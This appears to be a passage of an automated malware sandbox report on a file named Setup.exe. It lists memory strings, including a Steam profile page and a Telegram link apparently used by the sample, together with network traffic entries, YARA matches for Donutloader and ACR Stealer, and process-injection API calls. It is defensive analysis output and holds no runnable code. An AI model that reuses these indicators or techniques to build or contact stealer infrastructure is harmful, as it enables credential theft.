      Source: Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/poin
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/points/shop/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/stats/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
      Source: Setup.exe, Setup.exe, 00000000.00000002.2771839573.00000000031EC000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2771447715.00000000030D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/sdfasdjr
      Source: chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
      Source: chrome.exe, 00000002.00000002.3553921309.000065080272C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://update.googleapis.com/service/update2/json
      Source: chrome.exe, 00000002.00000002.3541370501.0000650800040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2504426717.0000650800340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2504426717.0000650800343000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://update.googleapis.com/service/update2/json?cup2key=13:OIBbUfwhMnqdxbWyvOJC_kK27q7qls8Go0LZCI
      Source: chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
      Source: chrome.exe, 00000002.00000002.3546607316.0000650800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
      Source: chrome.exe, 00000002.00000002.3546607316.0000650800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
      Source: chrome.exe, 00000002.00000002.3546607316.0000650800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
      Source: chrome.exe, 00000002.00000003.1906108233.00006508002B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
      Source: chrome.exe, 00000002.00000003.1906108233.00006508002B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: chrome.exe, 00000002.00000003.1906108233.00006508002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881689920.0000650800454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885837687.0000650800454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1883841113.0000650800454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: chrome.exe, 00000002.00000003.1888797154.0000650800CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882396107.0000650800CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1883574094.0000650800CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888667895.0000650800F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1878438319.000065080048C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885769494.0000650800CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2001447093.0000650800454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543721335.00006508005E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882698145.0000650800CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544227255.00006508006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546867891.0000650800CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
      Source: chrome.exe, 00000002.00000002.3544789255.000065080080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char:i3
      Source: chrome.exe, 00000002.00000002.3546830212.0000650800C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
      Source: chrome.exe, 00000002.00000002.3546830212.0000650800C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2hd/
      Source: chrome.exe, 00000002.00000002.3547579560.0000650800DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
      Source: chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3545335468.0000650800960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544926795.0000650800868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
      Source: chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gsOpen
      Source: chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gse
      Source: chrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS00MGQ5LTg
      Source: chrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_thi
      Source: chrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0/jamhcn
      Source: chrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/acccxbt6wwsvpxzpob4hojndwkqq_4.10.2830.0/oimompe
      Source: chrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/acy5mdne3lup4k7xyd5szdvx6hqa_477/lmelglejhemejgi
      Source: chrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/gonpemd
      Source: chrome.exe, 00000002.00000002.3543854065.0000650800638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/ee
      Source: chrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/ads7ltfl2gw6hxwgakn3sxrkoijq_9.53.0/gcmjkmgdlgnk
      Source: chrome.exe, 00000002.00000002.3543854065.0000650800638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocnca
      Source: chrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/fw4ggtylvtq6i65ti33m4vqijm_2024.12.14.1/kiabhabj
      Source: chrome.exe, 00000002.00000002.3543297672.00006508004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544470238.000065080074C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543332924.00006508004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546706926.0000650800C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: chrome.exe, 00000002.00000003.2637755343.0000650800454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2001447093.0000650800454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922378839.0000650802F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
      Source: chrome.exe, 00000002.00000003.2637755343.0000650800454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922510832.0000650803084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2001447093.0000650800454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922793205.0000650801354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922659890.0000650803030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922378839.0000650802F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
      Source: Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
      Source: chrome.exe, 00000002.00000003.1888826743.000065080040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1889004039.00006508010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
      Source: chrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
      Source: chrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submite
      Source: chrome.exe, 00000002.00000002.3545924455.0000650800A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
      Source: chrome.exe, 00000002.00000003.1906108233.00006508002B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
      Source: chrome.exe, 00000002.00000002.3541299980.000065080000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
      Source: chrome.exe, 00000002.00000002.3549671289.0000650801150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.
      Source: chrome.exe, 00000002.00000003.1906108233.00006508002B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: chrome.exe, 00000002.00000002.3549671289.0000650801150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.om
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
      Source: chrome.exe, 00000002.00000002.3549671289.0000650801150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: chrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
      Source: chrome.exe, 00000002.00000003.1922929258.000065080300C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
      Source: chrome.exe, 00000002.00000003.1922640361.0000650801080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922877477.0000650802FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922356418.00006508030B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922329877.00006508030A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1923097696.00006508013DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3555114389.0000650803044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922224169.0000650802FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922929258.000065080300C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
      Source: chrome.exe, 00000002.00000003.1922929258.000065080300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922510832.0000650803084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3545415544.000065080098C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922793205.0000650801354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922659890.0000650803030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922378839.0000650802F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
      Source: chrome.exe, 00000002.00000003.1922929258.000065080300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922510832.0000650803084000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922793205.0000650801354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922659890.0000650803030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922378839.0000650802F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
      Source: Setup.exe, 00000000.00000000.1676596089.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.innosetup.com/
      Source: Setup.exe, 00000000.00000000.1676596089.0000000000401000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.remobjects.com/ps
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
      Source: chrome.exe, 00000002.00000002.3542562259.00006508002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543890573.0000650800659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.2.114:443 -> 192.168.2.4:49734 version: TLS 1.2

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 0.2.Setup.exe.2d223e4.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
      Source: 0.2.Setup.exe.2d223e4.0.unpack, type: UNPACKEDPEMatched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
      Source: 0.2.Setup.exe.2d223e4.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
      Source: 0.2.Setup.exe.2d223e4.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
      Source: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02DC1927 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_02DC1927
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031A5280 NtCreateFile,GetProcessHeap,RtlAllocateHeap,NtReadFile,0_2_031A5280
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_03182A20 NtQueryAttributesFile,0_2_03182A20
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_03199F30 NtQuerySystemInformation,0_2_03199F30
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_03199D60 NtQuerySystemInformation,0_2_03199D60
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D203670_2_02D20367
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02DC19270_2_02DC1927
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D473840_2_02D47384
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D593880_2_02D59388
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D343440_2_02D34344
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D413140_2_02D41314
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D263040_2_02D26304
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D200010_2_02D20001
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D421D70_2_02D421D7
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D891A40_2_02D891A4
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D231040_2_02D23104
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D2D7740_2_02D2D774
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D477240_2_02D47724
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D4A4B40_2_02D4A4B4
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D274540_2_02D27454
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D2B4040_2_02D2B404
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D2A5C40_2_02D2A5C4
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D235E40_2_02D235E4
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D465940_2_02D46594
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D47AC40_2_02D47AC4
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D46B540_2_02D46B54
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D71B240_2_02D71B24
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D268D40_2_02D268D4
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D498640_2_02D49864
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D338640_2_02D33864
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D519E40_2_02D519E4
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D7C9ED0_2_02D7C9ED
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D349940_2_02D34994
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D47EE40_2_02D47EE4
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D22E840_2_02D22E84
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D56EA40_2_02D56EA4
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D26EA40_2_02D26EA4
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D44E740_2_02D44E74
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D82E770_2_02D82E77
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D23F940_2_02D23F94
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D23F860_2_02D23F86
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D49FA40_2_02D49FA4
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D42F770_2_02D42F77
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D46F640_2_02D46F64
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D79C940_2_02D79C94
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D77C670_2_02D77C67
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D53C640_2_02D53C64
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D4BD840_2_02D4BD84
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D4AD740_2_02D4AD74
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02D4BD6A0_2_02D4BD6A
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031820800_2_03182080
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031756C00_2_031756C0
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031A56C00_2_031A56C0
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031995900_2_03199590
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0319A5A00_2_0319A5A0
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_03182B600_2_03182B60
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0317E8300_2_0317E830
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_03179C200_2_03179C20
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031C03400_2_031C0340
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031953700_2_03195370
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031CB2090_2_031CB209
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031A02000_2_031A0200
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0319E2400_2_0319E240
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031962E00_2_031962E0
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0319A1200_2_0319A120
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031831B00_2_031831B0
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031980800_2_03198080
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031750F00_2_031750F0
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031967000_2_03196700
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031917930_2_03191793
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031957800_2_03195780
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031727B00_2_031727B0
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031727A20_2_031727A2
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031987C00_2_031987C0
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031936900_2_03193690
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031716A00_2_031716A0
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0319E4400_2_0319E440
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031A24800_2_031A2480
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031C64830_2_031C6483
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031C84B00_2_031C84B0
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0318FB300_2_0318FB30
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_03174B200_2_03174B20
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_03195BA00_2_03195BA0
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031A7BA40_2_031A7BA4
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031719200_2_03171920
      Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_031D79C00_2_031D79C0
